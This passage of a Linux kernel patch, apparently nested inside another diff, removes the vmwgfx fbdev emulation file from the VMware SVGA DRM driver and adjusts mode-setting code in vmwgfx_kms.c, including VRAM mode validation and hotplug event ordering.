+@@ -1223,9 +1194,6 @@ void vmw_kms_cursor_snoop(struct vmw_surface *srf,
+ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ 		       unsigned width, unsigned height, unsigned pitch,
+ 		       unsigned bpp, unsigned depth);
+-bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+-				uint32_t pitch,
+-				uint32_t height);
+ int vmw_kms_present(struct vmw_private *dev_priv,
+ 		    struct drm_file *file_priv,
+ 		    struct vmw_framebuffer *vfb,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c
+deleted file mode 100644
+index 5b85b477e4c69..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c
++++ /dev/null
+@@ -1,831 +0,0 @@
+-/**************************************************************************
+- *
+- * Copyright © 2007 David Airlie
+- * Copyright © 2009-2015 VMware, Inc., Palo Alto, CA., USA
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- *
+- **************************************************************************/
+-
+-#include <linux/fb.h>
+-#include <linux/pci.h>
+-
+-#include <drm/drm_fourcc.h>
+-#include <drm/ttm/ttm_placement.h>
+-
+-#include "vmwgfx_drv.h"
+-#include "vmwgfx_kms.h"
+-
+-#define VMW_DIRTY_DELAY (HZ / 30)
+-
+-struct vmw_fb_par {
+-	struct vmw_private *vmw_priv;
+-
+-	void *vmalloc;
+-
+-	struct mutex bo_mutex;
+-	struct vmw_buffer_object *vmw_bo;
+-	unsigned bo_size;
+-	struct drm_framebuffer *set_fb;
+-	struct drm_display_mode *set_mode;
+-	u32 fb_x;
+-	u32 fb_y;
+-	bool bo_iowrite;
+-
+-	u32 pseudo_palette[17];
+-
+-	unsigned max_width;
+-	unsigned max_height;
+-
+-	struct {
+-		spinlock_t lock;
+-		bool active;
+-		unsigned x1;
+-		unsigned y1;
+-		unsigned x2;
+-		unsigned y2;
+-	} dirty;
+-
+-	struct drm_crtc *crtc;
+-	struct drm_connector *con;
+-	struct delayed_work local_work;
+-};
+-
+-static int vmw_fb_setcolreg(unsigned regno, unsigned red, unsigned green,
+-			    unsigned blue, unsigned transp,
+-			    struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	u32 *pal = par->pseudo_palette;
+-
+-	if (regno > 15) {
+-		DRM_ERROR("Bad regno %u.\n", regno);
+-		return 1;
+-	}
+-
+-	switch (par->set_fb->format->depth) {
+-	case 24:
+-	case 32:
+-		pal[regno] = ((red & 0xff00) << 8) |
+-			      (green & 0xff00) |
+-			     ((blue  & 0xff00) >> 8);
+-		break;
+-	default:
+-		DRM_ERROR("Bad depth %u, bpp %u.\n",
+-			  par->set_fb->format->depth,
+-			  par->set_fb->format->cpp[0] * 8);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_check_var(struct fb_var_screeninfo *var,
+-			    struct fb_info *info)
+-{
+-	int depth = var->bits_per_pixel;
+-	struct vmw_fb_par *par = info->par;
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-
+-	switch (var->bits_per_pixel) {
+-	case 32:
+-		depth = (var->transp.length > 0) ? 32 : 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad bpp %u.\n", var->bits_per_pixel);
+-		return -EINVAL;
+-	}
+-
+-	switch (depth) {
+-	case 24:
+-		var->red.offset = 16;
+-		var->green.offset = 8;
+-		var->blue.offset = 0;
+-		var->red.length = 8;
+-		var->green.length = 8;
+-		var->blue.length = 8;
+-		var->transp.length = 0;
+-		var->transp.offset = 0;
+-		break;
+-	case 32:
+-		var->red.offset = 16;
+-		var->green.offset = 8;
+-		var->blue.offset = 0;
+-		var->red.length = 8;
+-		var->green.length = 8;
+-		var->blue.length = 8;
+-		var->transp.length = 8;
+-		var->transp.offset = 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad depth %u.\n", depth);
+-		return -EINVAL;
+-	}
+-
+-	if ((var->xoffset + var->xres) > par->max_width ||
+-	    (var->yoffset + var->yres) > par->max_height) {
+-		DRM_ERROR("Requested geom can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	if (!vmw_kms_validate_mode_vram(vmw_priv,
+-					var->xres * var->bits_per_pixel/8,
+-					var->yoffset + var->yres)) {
+-		DRM_ERROR("Requested geom can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_blank(int blank, struct fb_info *info)
+-{
+-	return 0;
+-}
+-
+-/**
+- * vmw_fb_dirty_flush - flush dirty regions to the kms framebuffer
+- *
+- * @work: The struct work_struct associated with this task.
+- *
+- * This function flushes the dirty regions of the vmalloc framebuffer to the
+- * kms framebuffer, and if the kms framebuffer is visible, also updated the
+- * corresponding displays. Note that this function runs even if the kms
+- * framebuffer is not bound to a crtc and thus not visible, but it's turned
+- * off during hibernation using the par->dirty.active bool.
+- */
+-static void vmw_fb_dirty_flush(struct work_struct *work)
+-{
+-	struct vmw_fb_par *par = container_of(work, struct vmw_fb_par,
+-					      local_work.work);
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-	struct fb_info *info = vmw_priv->fb_info;
+-	unsigned long irq_flags;
+-	s32 dst_x1, dst_x2, dst_y1, dst_y2, w = 0, h = 0;
+-	u32 cpp, max_x, max_y;
+-	struct drm_clip_rect clip;
+-	struct drm_framebuffer *cur_fb;
+-	u8 *src_ptr, *dst_ptr;
+-	struct vmw_buffer_object *vbo = par->vmw_bo;
+-	void *virtual;
+-
+-	if (!READ_ONCE(par->dirty.active))
+-		return;
+-
+-	mutex_lock(&par->bo_mutex);
+-	cur_fb = par->set_fb;
+-	if (!cur_fb)
+-		goto out_unlock;
+-
+-	(void) ttm_bo_reserve(&vbo->base, false, false, NULL);
+-	virtual = vmw_bo_map_and_cache(vbo);
+-	if (!virtual)
+-		goto out_unreserve;
+-
+-	spin_lock_irqsave(&par->dirty.lock, irq_flags);
+-	if (!par->dirty.active) {
+-		spin_unlock_irqrestore(&par->dirty.lock, irq_flags);
+-		goto out_unreserve;
+-	}
+-
+-	/*
+-	 * Handle panning when copying from vmalloc to framebuffer.
+-	 * Clip dirty area to framebuffer.
+-	 */
+-	cpp = cur_fb->format->cpp[0];
+-	max_x = par->fb_x + cur_fb->width;
+-	max_y = par->fb_y + cur_fb->height;
+-
+-	dst_x1 = par->dirty.x1 - par->fb_x;
+-	dst_y1 = par->dirty.y1 - par->fb_y;
+-	dst_x1 = max_t(s32, dst_x1, 0);
+-	dst_y1 = max_t(s32, dst_y1, 0);
+-
+-	dst_x2 = par->dirty.x2 - par->fb_x;
+-	dst_y2 = par->dirty.y2 - par->fb_y;
+-	dst_x2 = min_t(s32, dst_x2, max_x);
+-	dst_y2 = min_t(s32, dst_y2, max_y);
+-	w = dst_x2 - dst_x1;
+-	h = dst_y2 - dst_y1;
+-	w = max_t(s32, 0, w);
+-	h = max_t(s32, 0, h);
+-
+-	par->dirty.x1 = par->dirty.x2 = 0;
+-	par->dirty.y1 = par->dirty.y2 = 0;
+-	spin_unlock_irqrestore(&par->dirty.lock, irq_flags);
+-
+-	if (w && h) {
+-		dst_ptr = (u8 *)virtual  +
+-			(dst_y1 * par->set_fb->pitches[0] + dst_x1 * cpp);
+-		src_ptr = (u8 *)par->vmalloc +
+-			((dst_y1 + par->fb_y) * info->fix.line_length +
+-			 (dst_x1 + par->fb_x) * cpp);
+-
+-		while (h-- > 0) {
+-			memcpy(dst_ptr, src_ptr, w*cpp);
+-			dst_ptr += par->set_fb->pitches[0];
+-			src_ptr += info->fix.line_length;
+-		}
+-
+-		clip.x1 = dst_x1;
+-		clip.x2 = dst_x2;
+-		clip.y1 = dst_y1;
+-		clip.y2 = dst_y2;
+-	}
+-
+-out_unreserve:
+-	ttm_bo_unreserve(&vbo->base);
+-	if (w && h) {
+-		WARN_ON_ONCE(par->set_fb->funcs->dirty(cur_fb, NULL, 0, 0,
+-						       &clip, 1));
+-		vmw_cmd_flush(vmw_priv, false);
+-	}
+-out_unlock:
+-	mutex_unlock(&par->bo_mutex);
+-}
+-
+-static void vmw_fb_dirty_mark(struct vmw_fb_par *par,
+-			      unsigned x1, unsigned y1,
+-			      unsigned width, unsigned height)
+-{
+-	unsigned long flags;
+-	unsigned x2 = x1 + width;
+-	unsigned y2 = y1 + height;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	if (par->dirty.x1 == par->dirty.x2) {
+-		par->dirty.x1 = x1;
+-		par->dirty.y1 = y1;
+-		par->dirty.x2 = x2;
+-		par->dirty.y2 = y2;
+-		/* if we are active start the dirty work
+-		 * we share the work with the defio system */
+-		if (par->dirty.active)
+-			schedule_delayed_work(&par->local_work,
+-					      VMW_DIRTY_DELAY);
+-	} else {
+-		if (x1 < par->dirty.x1)
+-			par->dirty.x1 = x1;
+-		if (y1 < par->dirty.y1)
+-			par->dirty.y1 = y1;
+-		if (x2 > par->dirty.x2)
+-			par->dirty.x2 = x2;
+-		if (y2 > par->dirty.y2)
+-			par->dirty.y2 = y2;
+-	}
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-}
+-
+-static int vmw_fb_pan_display(struct fb_var_screeninfo *var,
+-			      struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-
+-	if ((var->xoffset + var->xres) > var->xres_virtual ||
+-	    (var->yoffset + var->yres) > var->yres_virtual) {
+-		DRM_ERROR("Requested panning can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&par->bo_mutex);
+-	par->fb_x = var->xoffset;
+-	par->fb_y = var->yoffset;
+-	if (par->set_fb)
+-		vmw_fb_dirty_mark(par, par->fb_x, par->fb_y, par->set_fb->width,
+-				  par->set_fb->height);
+-	mutex_unlock(&par->bo_mutex);
+-
+-	return 0;
+-}
+-
+-static void vmw_deferred_io(struct fb_info *info, struct list_head *pagereflist)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	unsigned long start, end, min, max;
+-	unsigned long flags;
+-	struct fb_deferred_io_pageref *pageref;
+-	int y1, y2;
+-
+-	min = ULONG_MAX;
+-	max = 0;
+-	list_for_each_entry(pageref, pagereflist, list) {
+-		start = pageref->offset;
+-		end = start + PAGE_SIZE - 1;
+-		min = min(min, start);
+-		max = max(max, end);
+-	}
+-
+-	if (min < max) {
+-		y1 = min / info->fix.line_length;
+-		y2 = (max / info->fix.line_length) + 1;
+-
+-		spin_lock_irqsave(&par->dirty.lock, flags);
+-		par->dirty.x1 = 0;
+-		par->dirty.y1 = y1;
+-		par->dirty.x2 = info->var.xres;
+-		par->dirty.y2 = y2;
+-		spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-		/*
+-		 * Since we've already waited on this work once, try to
+-		 * execute asap.
+-		 */
+-		cancel_delayed_work(&par->local_work);
+-		schedule_delayed_work(&par->local_work, 0);
+-	}
+-};
+-
+-static struct fb_deferred_io vmw_defio = {
+-	.delay		= VMW_DIRTY_DELAY,
+-	.deferred_io	= vmw_deferred_io,
+-};
+-
+-/*
+- * Draw code
+- */
+-
+-static void vmw_fb_fillrect(struct fb_info *info, const struct fb_fillrect *rect)
+-{
+-	cfb_fillrect(info, rect);
+-	vmw_fb_dirty_mark(info->par, rect->dx, rect->dy,
+-			  rect->width, rect->height);
+-}
+-
+-static void vmw_fb_copyarea(struct fb_info *info, const struct fb_copyarea *region)
+-{
+-	cfb_copyarea(info, region);
+-	vmw_fb_dirty_mark(info->par, region->dx, region->dy,
+-			  region->width, region->height);
+-}
+-
+-static void vmw_fb_imageblit(struct fb_info *info, const struct fb_image *image)
+-{
+-	cfb_imageblit(info, image);
+-	vmw_fb_dirty_mark(info->par, image->dx, image->dy,
+-			  image->width, image->height);
+-}
+-
+-/*
+- * Bring up code
+- */
+-
+-static int vmw_fb_create_bo(struct vmw_private *vmw_priv,
+-			    size_t size, struct vmw_buffer_object **out)
+-{
+-	struct vmw_buffer_object *vmw_bo;
+-	int ret;
+-
+-	ret = vmw_bo_create(vmw_priv, size,
+-			      &vmw_sys_placement,
+-			      false, false,
+-			      &vmw_bo_bo_free, &vmw_bo);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+-	*out = vmw_bo;
+-
+-	return ret;
+-}
+-
+-static int vmw_fb_compute_depth(struct fb_var_screeninfo *var,
+-				int *depth)
+-{
+-	switch (var->bits_per_pixel) {
+-	case 32:
+-		*depth = (var->transp.length > 0) ? 32 : 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad bpp %u.\n", var->bits_per_pixel);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmwgfx_set_config_internal(struct drm_mode_set *set)
+-{
+-	struct drm_crtc *crtc = set->crtc;
+-	struct drm_modeset_acquire_ctx ctx;
+-	int ret;
+-
+-	drm_modeset_acquire_init(&ctx, 0);
+-
+-restart:
+-	ret = crtc->funcs->set_config(set, &ctx);
+-
+-	if (ret == -EDEADLK) {
+-		drm_modeset_backoff(&ctx);
+-		goto restart;
+-	}
+-
+-	drm_modeset_drop_locks(&ctx);
+-	drm_modeset_acquire_fini(&ctx);
+-
+-	return ret;
+-}
+-
+-static int vmw_fb_kms_detach(struct vmw_fb_par *par,
+-			     bool detach_bo,
+-			     bool unref_bo)
+-{
+-	struct drm_framebuffer *cur_fb = par->set_fb;
+-	int ret;
+-
+-	/* Detach the KMS framebuffer from crtcs */
+-	if (par->set_mode) {
+-		struct drm_mode_set set;
+-
+-		set.crtc = par->crtc;
+-		set.x = 0;
+-		set.y = 0;
+-		set.mode = NULL;
+-		set.fb = NULL;
+-		set.num_connectors = 0;
+-		set.connectors = &par->con;
+-		ret = vmwgfx_set_config_internal(&set);
+-		if (ret) {
+-			DRM_ERROR("Could not unset a mode.\n");
+-			return ret;
+-		}
+-		drm_mode_destroy(&par->vmw_priv->drm, par->set_mode);
+-		par->set_mode = NULL;
+-	}
+-
+-	if (cur_fb) {
+-		drm_framebuffer_put(cur_fb);
+-		par->set_fb = NULL;
+-	}
+-
+-	if (par->vmw_bo && detach_bo && unref_bo)
+-		vmw_bo_unreference(&par->vmw_bo);
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_kms_framebuffer(struct fb_info *info)
+-{
+-	struct drm_mode_fb_cmd2 mode_cmd = {0};
+-	struct vmw_fb_par *par = info->par;
+-	struct fb_var_screeninfo *var = &info->var;
+-	struct drm_framebuffer *cur_fb;
+-	struct vmw_framebuffer *vfb;
+-	int ret = 0, depth;
+-	size_t new_bo_size;
+-
+-	ret = vmw_fb_compute_depth(var, &depth);
+-	if (ret)
+-		return ret;
+-
+-	mode_cmd.width = var->xres;
+-	mode_cmd.height = var->yres;
+-	mode_cmd.pitches[0] = ((var->bits_per_pixel + 7) / 8) * mode_cmd.width;
+-	mode_cmd.pixel_format =
+-		drm_mode_legacy_fb_format(var->bits_per_pixel, depth);
+-
+-	cur_fb = par->set_fb;
+-	if (cur_fb && cur_fb->width == mode_cmd.width &&
+-	    cur_fb->height == mode_cmd.height &&
+-	    cur_fb->format->format == mode_cmd.pixel_format &&
+-	    cur_fb->pitches[0] == mode_cmd.pitches[0])
+-		return 0;
+-
+-	/* Need new buffer object ? */
+-	new_bo_size = (size_t) mode_cmd.pitches[0] * (size_t) mode_cmd.height;
+-	ret = vmw_fb_kms_detach(par,
+-				par->bo_size < new_bo_size ||
+-				par->bo_size > 2*new_bo_size,
+-				true);
+-	if (ret)
+-		return ret;
+-
+-	if (!par->vmw_bo) {
+-		ret = vmw_fb_create_bo(par->vmw_priv, new_bo_size,
+-				       &par->vmw_bo);
+-		if (ret) {
+-			DRM_ERROR("Failed creating a buffer object for "
+-				  "fbdev.\n");
+-			return ret;
+-		}
+-		par->bo_size = new_bo_size;
+-	}
+-
+-	vfb = vmw_kms_new_framebuffer(par->vmw_priv, par->vmw_bo, NULL,
+-				      true, &mode_cmd);
+-	if (IS_ERR(vfb))
+-		return PTR_ERR(vfb);
+-
+-	par->set_fb = &vfb->base;
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_set_par(struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-	struct drm_mode_set set;
+-	struct fb_var_screeninfo *var = &info->var;
+-	struct drm_display_mode new_mode = { DRM_MODE("fb_mode",
+-		DRM_MODE_TYPE_DRIVER,
+-		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
+-	};
+-	struct drm_display_mode *mode;
+-	int ret;
+-
+-	mode = drm_mode_duplicate(&vmw_priv->drm, &new_mode);
+-	if (!mode) {
+-		DRM_ERROR("Could not create new fb mode.\n");
+-		return -ENOMEM;
+-	}
+-
+-	mode->hdisplay = var->xres;
+-	mode->vdisplay = var->yres;
+-	vmw_guess_mode_timing(mode);
+-
+-	if (!vmw_kms_validate_mode_vram(vmw_priv,
+-					mode->hdisplay *
+-					DIV_ROUND_UP(var->bits_per_pixel, 8),
+-					mode->vdisplay)) {
+-		drm_mode_destroy(&vmw_priv->drm, mode);
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&par->bo_mutex);
+-	ret = vmw_fb_kms_framebuffer(info);
+-	if (ret)
+-		goto out_unlock;
+-
+-	par->fb_x = var->xoffset;
+-	par->fb_y = var->yoffset;
+-
+-	set.crtc = par->crtc;
+-	set.x = 0;
+-	set.y = 0;
+-	set.mode = mode;
+-	set.fb = par->set_fb;
+-	set.num_connectors = 1;
+-	set.connectors = &par->con;
+-
+-	ret = vmwgfx_set_config_internal(&set);
+-	if (ret)
+-		goto out_unlock;
+-
+-	vmw_fb_dirty_mark(par, par->fb_x, par->fb_y,
+-			  par->set_fb->width, par->set_fb->height);
+-
+-	/* If there already was stuff dirty we wont
+-	 * schedule a new work, so lets do it now */
+-
+-	schedule_delayed_work(&par->local_work, 0);
+-
+-out_unlock:
+-	if (par->set_mode)
+-		drm_mode_destroy(&vmw_priv->drm, par->set_mode);
+-	par->set_mode = mode;
+-
+-	mutex_unlock(&par->bo_mutex);
+-
+-	return ret;
+-}
+-
+-
+-static const struct fb_ops vmw_fb_ops = {
+-	.owner = THIS_MODULE,
+-	.fb_check_var = vmw_fb_check_var,
+-	.fb_set_par = vmw_fb_set_par,
+-	.fb_setcolreg = vmw_fb_setcolreg,
+-	.fb_fillrect = vmw_fb_fillrect,
+-	.fb_copyarea = vmw_fb_copyarea,
+-	.fb_imageblit = vmw_fb_imageblit,
+-	.fb_pan_display = vmw_fb_pan_display,
+-	.fb_blank = vmw_fb_blank,
+-	.fb_mmap = fb_deferred_io_mmap,
+-};
+-
+-int vmw_fb_init(struct vmw_private *vmw_priv)
+-{
+-	struct device *device = vmw_priv->drm.dev;
+-	struct vmw_fb_par *par;
+-	struct fb_info *info;
+-	unsigned fb_width, fb_height;
+-	unsigned int fb_bpp, fb_pitch, fb_size;
+-	struct drm_display_mode *init_mode;
+-	int ret;
+-
+-	fb_bpp = 32;
+-
+-	/* XXX As shouldn't these be as well. */
+-	fb_width = min(vmw_priv->fb_max_width, (unsigned)2048);
+-	fb_height = min(vmw_priv->fb_max_height, (unsigned)2048);
+-
+-	fb_pitch = fb_width * fb_bpp / 8;
+-	fb_size = fb_pitch * fb_height;
+-
+-	info = framebuffer_alloc(sizeof(*par), device);
+-	if (!info)
+-		return -ENOMEM;
+-
+-	/*
+-	 * Par
+-	 */
+-	vmw_priv->fb_info = info;
+-	par = info->par;
+-	memset(par, 0, sizeof(*par));
+-	INIT_DELAYED_WORK(&par->local_work, &vmw_fb_dirty_flush);
+-	par->vmw_priv = vmw_priv;
+-	par->vmalloc = NULL;
+-	par->max_width = fb_width;
+-	par->max_height = fb_height;
+-
+-	ret = vmw_kms_fbdev_init_data(vmw_priv, 0, par->max_width,
+-				      par->max_height, &par->con,
+-				      &par->crtc, &init_mode);
+-	if (ret)
+-		goto err_kms;
+-
+-	info->var.xres = init_mode->hdisplay;
+-	info->var.yres = init_mode->vdisplay;
+-
+-	/*
+-	 * Create buffers and alloc memory
+-	 */
+-	par->vmalloc = vzalloc(fb_size);
+-	if (unlikely(par->vmalloc == NULL)) {
+-		ret = -ENOMEM;
+-		goto err_free;
+-	}
+-
+-	/*
+-	 * Fixed and var
+-	 */
+-	strcpy(info->fix.id, "svgadrmfb");
+-	info->fix.type = FB_TYPE_PACKED_PIXELS;
+-	info->fix.visual = FB_VISUAL_TRUECOLOR;
+-	info->fix.type_aux = 0;
+-	info->fix.xpanstep = 1; /* doing it in hw */
+-	info->fix.ypanstep = 1; /* doing it in hw */
+-	info->fix.ywrapstep = 0;
+-	info->fix.accel = FB_ACCEL_NONE;
+-	info->fix.line_length = fb_pitch;
+-
+-	info->fix.smem_start = 0;
+-	info->fix.smem_len = fb_size;
+-
+-	info->pseudo_palette = par->pseudo_palette;
+-	info->screen_base = (char __iomem *)par->vmalloc;
+-	info->screen_size = fb_size;
+-
+-	info->fbops = &vmw_fb_ops;
+-
+-	/* 24 depth per default */
+-	info->var.red.offset = 16;
+-	info->var.green.offset = 8;
+-	info->var.blue.offset = 0;
+-	info->var.red.length = 8;
+-	info->var.green.length = 8;
+-	info->var.blue.length = 8;
+-	info->var.transp.offset = 0;
+-	info->var.transp.length = 0;
+-
+-	info->var.xres_virtual = fb_width;
+-	info->var.yres_virtual = fb_height;
+-	info->var.bits_per_pixel = fb_bpp;
+-	info->var.xoffset = 0;
+-	info->var.yoffset = 0;
+-	info->var.activate = FB_ACTIVATE_NOW;
+-	info->var.height = -1;
+-	info->var.width = -1;
+-
+-	/* Use default scratch pixmap (info->pixmap.flags = FB_PIXMAP_SYSTEM) */
+-	info->apertures = alloc_apertures(1);
+-	if (!info->apertures) {
+-		ret = -ENOMEM;
+-		goto err_aper;
+-	}
+-	info->apertures->ranges[0].base = vmw_priv->vram_start;
+-	info->apertures->ranges[0].size = vmw_priv->vram_size;
+-
+-	/*
+-	 * Dirty & Deferred IO
+-	 */
+-	par->dirty.x1 = par->dirty.x2 = 0;
+-	par->dirty.y1 = par->dirty.y2 = 0;
+-	par->dirty.active = true;
+-	spin_lock_init(&par->dirty.lock);
+-	mutex_init(&par->bo_mutex);
+-	info->fbdefio = &vmw_defio;
+-	fb_deferred_io_init(info);
+-
+-	ret = register_framebuffer(info);
+-	if (unlikely(ret != 0))
+-		goto err_defio;
+-
+-	vmw_fb_set_par(info);
+-
+-	return 0;
+-
+-err_defio:
+-	fb_deferred_io_cleanup(info);
+-err_aper:
+-err_free:
+-	vfree(par->vmalloc);
+-err_kms:
+-	framebuffer_release(info);
+-	vmw_priv->fb_info = NULL;
+-
+-	return ret;
+-}
+-
+-int vmw_fb_close(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-
+-	if (!vmw_priv->fb_info)
+-		return 0;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	/* ??? order */
+-	fb_deferred_io_cleanup(info);
+-	cancel_delayed_work_sync(&par->local_work);
+-	unregister_framebuffer(info);
+-
+-	mutex_lock(&par->bo_mutex);
+-	(void) vmw_fb_kms_detach(par, true, true);
+-	mutex_unlock(&par->bo_mutex);
+-
+-	vfree(par->vmalloc);
+-	framebuffer_release(info);
+-
+-	return 0;
+-}
+-
+-int vmw_fb_off(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-	unsigned long flags;
+-
+-	if (!vmw_priv->fb_info)
+-		return -EINVAL;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	par->dirty.active = false;
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-	flush_delayed_work(&info->deferred_work);
+-	flush_delayed_work(&par->local_work);
+-
+-	return 0;
+-}
+-
+-int vmw_fb_on(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-	unsigned long flags;
+-
+-	if (!vmw_priv->fb_info)
+-		return -EINVAL;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	par->dirty.active = true;
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-	/*
+-	 * Need to reschedule a dirty update, because otherwise that's
+-	 * only done in dirty_mark() if the previous coalesced
+-	 * dirty region was empty.
+-	 */
+-	schedule_delayed_work(&par->local_work, 0);
+-
+-	return 0;
+-}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index b1aed051b41ab..5b30e4ba2811a 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -31,6 +31,7 @@
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_rect.h>
+ #include <drm/drm_sysfs.h>
++#include <drm/drm_edid.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -1988,6 +1989,8 @@ int vmw_kms_init(struct vmw_private *dev_priv)
+ 	dev->mode_config.min_height = 1;
+ 	dev->mode_config.max_width = dev_priv->texture_max_width;
+ 	dev->mode_config.max_height = dev_priv->texture_max_height;
++	dev->mode_config.preferred_depth = dev_priv->assume_16bpp ? 16 : 32;
++	dev->mode_config.prefer_shadow_fbdev = !dev_priv->has_mob;
+ 
+ 	drm_mode_create_suggested_offset_properties(dev);
+ 	vmw_kms_create_hotplug_mode_update_property(dev_priv);
+@@ -2082,13 +2085,12 @@ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ 	return 0;
+ }
+ 
++static
+ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+-				uint32_t pitch,
+-				uint32_t height)
++				u64 pitch,
++				u64 height)
+ {
+-	return ((u64) pitch * (u64) height) < (u64)
+-		((dev_priv->active_display_unit == vmw_du_screen_target) ?
+-		 dev_priv->max_primary_mem : dev_priv->vram_size);
++	return (pitch * height) < (u64)dev_priv->vram_size;
+ }
+ 
+ /**
+@@ -2134,8 +2136,8 @@ static int vmw_du_update_layout(struct vmw_private *dev_priv,
+ 			du->gui_x = rects[du->unit].x1;
+ 			du->gui_y = rects[du->unit].y1;
+ 		} else {
+-			du->pref_width = 800;
+-			du->pref_height = 600;
++			du->pref_width  = VMWGFX_MIN_INITIAL_WIDTH;
++			du->pref_height = VMWGFX_MIN_INITIAL_HEIGHT;
+ 			du->pref_active = false;
+ 			du->gui_x = 0;
+ 			du->gui_y = 0;
+@@ -2162,13 +2164,13 @@ static int vmw_du_update_layout(struct vmw_private *dev_priv,
+ 		}
+ 		con->status = vmw_du_connector_detect(con, true);
+ 	}
+-
+-	drm_sysfs_hotplug_event(dev);
+ out_fini:
+ 	drm_modeset_drop_locks(&ctx);
+ 	drm_modeset_acquire_fini(&ctx);
+ 	mutex_unlock(&dev->mode_config.mutex);
+ 
++	drm_sysfs_hotplug_event(dev);
++
+ 	return 0;
+ }
+ 
+@@ -2211,107 +2213,6 @@ vmw_du_connector_detect(struct drm_connector *connector, bool force)
+ 		connector_status_connected : connector_status_disconnected);
+ }
+ 
+-static struct drm_display_mode vmw_kms_connector_builtin[] = {
+-	/* 640x480@60Hz */
+-	{ DRM_MODE("640x480", DRM_MODE_TYPE_DRIVER, 25175, 640, 656,
+-		   752, 800, 0, 480, 489, 492, 525, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 800x600@60Hz */
+-	{ DRM_MODE("800x600", DRM_MODE_TYPE_DRIVER, 40000, 800, 840,
+-		   968, 1056, 0, 600, 601, 605, 628, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1024x768@60Hz */
+-	{ DRM_MODE("1024x768", DRM_MODE_TYPE_DRIVER, 65000, 1024, 1048,
+-		   1184, 1344, 0, 768, 771, 777, 806, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 1152x864@75Hz */
+-	{ DRM_MODE("1152x864", DRM_MODE_TYPE_DRIVER, 108000, 1152, 1216,
+-		   1344, 1600, 0, 864, 865, 868, 900, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x720@60Hz */
+-	{ DRM_MODE("1280x720", DRM_MODE_TYPE_DRIVER, 74500, 1280, 1344,
+-		   1472, 1664, 0, 720, 723, 728, 748, 0,
